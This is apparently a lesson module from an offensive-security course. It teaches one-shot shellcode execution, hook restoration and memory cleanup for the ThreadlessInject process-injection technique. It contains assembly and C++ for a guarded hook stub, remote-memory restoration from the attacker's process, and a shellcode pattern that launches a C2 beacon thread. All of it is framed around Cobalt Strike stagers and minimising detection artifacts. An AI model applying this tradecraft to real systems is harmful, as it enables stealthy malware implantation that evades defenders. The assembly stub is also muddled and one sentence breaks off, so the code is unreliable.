Difficulty: Advanced

Module 7: Shellcode Execution & Cleanup

One-shot execution: run the payload once, then restore the hook and vanish.

The One-Shot Problem

ThreadlessInject is designed as a one-shot injection mechanism. The hook should fire once, execute the shellcode payload, and then clean itself up so the hooked function returns to normal. If the hook stays active, the shellcode runs every time the function is called, which creates problems: repeated execution of initialization shellcode (like a Cobalt Strike stager) will crash or behave incorrectly, the added latency on every call degrades performance, and the persistent hook is a detection artifact.

Why One-Shot Matters

Most shellcode payloads (stagers, loaders, implant bootstraps) are designed to run exactly once. They perform initialization, spawn their own thread for the C2 communication loop, and return. If the hook stub calls the shellcode every time the hooked function is called, you get multiple initializations, multiple C2 connections, and likely crashes from double-initialization of global state.

ScenarioPersistent HookOne-Shot Hook
Shellcode execution countEvery call to hooked functionExactly once
C2 connectionsMultiple (one per trigger)Single
Process stabilityDegrades over timeReturns to normal
Detection windowPermanent hook artifactBrief, then clean
Performance impactContinuous overheadOne-time delay

The Execution Guard: Preventing Re-Execution

There are several approaches to ensuring one-shot execution. The actual ThreadlessInject tool uses self-restoration: the loader stub writes the original function bytes back over the hook before calling the shellcode, so the hook is removed on first trigger and subsequent calls go straight to the original function. The injector process then polls the hooked function's bytes (via NtReadVirtualMemory) for up to 60 seconds to detect when the original bytes have been restored, confirming execution occurred.

An alternative approach (shown below for educational purposes) uses an execution guard flag stored in the allocated memory region. The hook stub checks this flag before calling the shellcode. On the first execution, the flag is clear, so the shellcode runs. The stub then sets the flag, and all subsequent invocations skip the shellcode call.

x86-64 ASM; Modified hook stub with execution guard
hook_stub:
    ; Check the execution guard (a DWORD at a known offset in our memory region)
    ; The guard is initialized to 0 by the injector
    lea rax, [rip + guard_offset]   ; Load address of guard variable
    lock cmpxchg [rax], ecx         ; Atomically check and set
    ; Alternative simpler approach:
    mov eax, [rip + guard_offset]   ; Read guard flag
    test eax, eax                   ; Is it zero?
    jnz skip_shellcode              ; If non-zero, skip shellcode (already executed)

    ; Set the guard to 1 (prevent future executions)
    mov dword ptr [rip + guard_offset], 1

    ; Save registers (same as Module 5)
    push rax
    push rcx
    ; ... (all registers saved)
    pushfq

    ; Align stack and call shellcode
    mov rbp, rsp
    and rsp, 0xFFFFFFF0
    sub rsp, 0x20
    mov rax, shellcode_addr
    call rax

    ; Restore registers
    mov rsp, rbp
    popfq
    ; ... (all registers restored)
    pop rax

skip_shellcode:
    ; Execute original bytes (always, regardless of guard)
    ; [14 bytes of saved original prologue]

    ; Jump back to hooked function + 14
    jmp [rip + 0]
    dq original_func_plus_14

guard_offset:
    dd 0    ; Initialized to 0, set to 1 after first execution

Atomic Guard with LOCK CMPXCHG

For true thread safety, the guard check should be atomic. Multiple threads might call the hooked function simultaneously, and we need to guarantee that only one thread executes the shellcode. The LOCK CMPXCHG instruction performs an atomic compare-and-swap: it checks if the guard is 0, and if so, sets it to 1 in a single atomic operation. Only the thread that successfully changes the guard from 0 to 1 proceeds to execute the shellcode; all other threads see the guard is already 1 and skip.

Self-Restoration: Unhooking After Execution

The most thorough cleanup approach is to restore the original function bytes after the shellcode executes. This removes the hook entirely, so the function returns to its original unmodified state. There are two ways to accomplish this:

Approach 1: Shellcode Restores the Hook

The shellcode itself can restore the original bytes. ThreadlessInject passes the necessary information (original function address, original bytes, byte count) to the shellcode, which uses NtProtectVirtualMemory and memcpy to restore the prologue:

C++// Shellcode-side restoration (running inside the target process)
// The shellcode has been given pointers to the original bytes and target address

void ShellcodeEntry(RESTORATION_INFO* info) {
    // Step 1: Do the actual payload work (e.g., spawn beacon)
    LoadAndExecutePayload();

    // Step 2: Restore the hooked function's original bytes
    ULONG oldProtect = 0;
    PVOID addr = info->hookedFuncAddr;
    SIZE_T size = 14;

    // Make the code page writable again
    NtProtectVirtualMemory(
        GetCurrentProcess(), &addr, &size,
        PAGE_EXECUTE_READWRITE, &oldProtect
    );

    // Copy original bytes back over the hook JMP
    memcpy(info->hookedFuncAddr, info->originalBytes, 14);

    // Restore original protection
    NtProtectVirtualMemory(
        GetCurrentProcess(), &addr, &size,
        oldProtect, &oldProtect
    );
}

Approach 2: Injector Monitors and Restores

Alternatively, the injector process can monitor for a signal that the shellcode has executed (e.g., by checking the guard flag in remote memory via NtReadVirtualMemory), then restore the original bytes from the injector side:

C++// Injector-side restoration (running in the attacker's process)
// Poll the guard flag until shellcode has executed

printf("[*] Waiting for shellcode execution...\n");

DWORD guard = 0;
while (guard == 0) {
    NtReadVirtualMemory(hProcess, guardFlagAddr, &guard, sizeof(guard), NULL);
    Sleep(100);  // Check every 100ms
}

printf("[+] Shellcode executed! Restoring original bytes...\n");

// Restore the original function prologue
PVOID protAddr = (PVOID)hookedFuncAddr;
SIZE_T protSize = 14;
ULONG oldProt = 0;

NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
    PAGE_EXECUTE_READWRITE, &oldProt);

NtWriteVirtualMemory(hProcess, (PVOID)hookedFuncAddr,
    originalBytes, 14, NULL);

NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
    oldProt, &oldProt);

printf("[+] Hook removed, original function restored.\n");

One-Shot Execution Timeline

T0: Hook installed, guard = 0, waiting for trigger
T1: Thread A calls hooked function, guard is 0 → shellcode executes
T2: Guard set to 1, shellcode spawns implant thread
T3: Thread B calls hooked function, guard is 1 → shellcode skipped
T4: Original bytes restored, hook removed entirely
T5: Function back to normal, no artifacts remain in prologue

Memory Cleanup

After the hook is removed and the original function is restored, the allocated memory region (containing the hook stub and shellcode) remains in the target process. For a simple stager that spawns its own long-running thread, this is acceptable — the stager code is no longer needed, but freeing it while the spawned thread might still reference it could cause issues.

For a thorough cleanup, you can optionally free the memory:

C++// Optional: Free the hook stub + shellcode memory
// Only safe if shellcode has fully bootstrapped and no longer needs the region
PVOID freeAddr = remoteBase;
SIZE_T freeSize = 0;  // 0 means release the entire region

NtFreeVirtualMemory(
    hProcess,
    &freeAddr,
    &freeSize,
    MEM_RELEASE
);
// The remote memory region is now freed
// Warning: only do this if the shellcode has completed bootstrapping

Cleanup Trade-offs

Freeing the remote memory is ideal for stealth but risky for stability. If the shellcode allocated any structures that point back into the hook region, or if the shellcode spawned a thread that occasionally references it, freeing the memory causes a use-after-free crash. In practice, many operators leave the memory allocated (it is small, typically a few kilobytes) and accept the minor forensic artifact. The hook stub memory in RX protection without a backing image file is itself a detection vector, but it is less conspicuous than an active hook on a function prologue.

Handling Shellcode That Blocks

Some shellcode payloads block (run for a long time or indefinitely) rather than quickly spawning a thread and returning. If your shellcode blocks, the thread that triggered the hook is stuck in the shellcode and never returns to the hooked function. This means:

For this reason, well-designed shellcode for threadless injection should follow the pattern: spawn a new thread (or work item) for the long-running C2 loop, then return control to the hook stub immediately. This way, the hijacked thread resumes its normal operation within milliseconds.

C++// Good shellcode pattern for threadless injection:
// Spawn a worker thread for the long-running payload, then return quickly

void ShellcodeEntry() {
    // Quickly bootstrap: resolve CreateThread, allocate implant memory, etc.
    pCreateThread CreateThread = ResolveAPI("kernel32.dll", "CreateThread");

    // Spawn the long-running C2 loop on a new thread
    CreateThread(NULL, 0, BeaconMainLoop, NULL, 0, NULL);

    // Return immediately so the hook stub can restore registers
    // and resume the hooked function
    return;
}
// Total time on the hijacked thread: ~1ms for the bootstrap

The Clean State After Execution

When the one-shot pattern works correctly, the end state is remarkably clean: the shellcode has spawned its implant on a new thread (which looks like any other thread to the OS), the hooked function has been restored to its original bytes, and the only remaining artifact is the allocated memory region containing the now-inactive hook stub. Compare this to traditional injection where a thread exists whose start address points to VirtualAllocEx'd memory — ThreadlessInject's forensic footprint is substantially smaller.

Pop Quiz: Execution & Cleanup

Q1: Why is one-shot execution important for ThreadlessInject?

Shellcode payloads like Cobalt Strike stagers perform one-time initialization: resolving API addresses, establishing C2 connections, allocating global structures. Running this initialization multiple times causes duplicate connections, double-free bugs, or corruption of global state. The one-shot pattern ensures the shellcode runs exactly once.

Q2: How does LOCK CMPXCHG help with the execution guard?

LOCK CMPXCHG performs an atomic compare-and-swap. It reads the guard, compares it to 0, and if they match, writes 1 — all in a single atomic operation. If two threads hit the hook simultaneously, only one will see the guard as 0 and set it to 1; the other will see 1 and skip the shellcode.

Q3: Why should shellcode for threadless injection spawn a new thread and return quickly?

The hook runs on an existing thread that was about to call the hooked function. If the shellcode blocks (e.g., enters a C2 loop), that thread never returns from the function call. This means whatever the thread was doing (processing messages, handling connections, etc.) stops, which can break the target application. By spawning a new thread for the long-running work and returning immediately, the existing thread resumes its normal duties.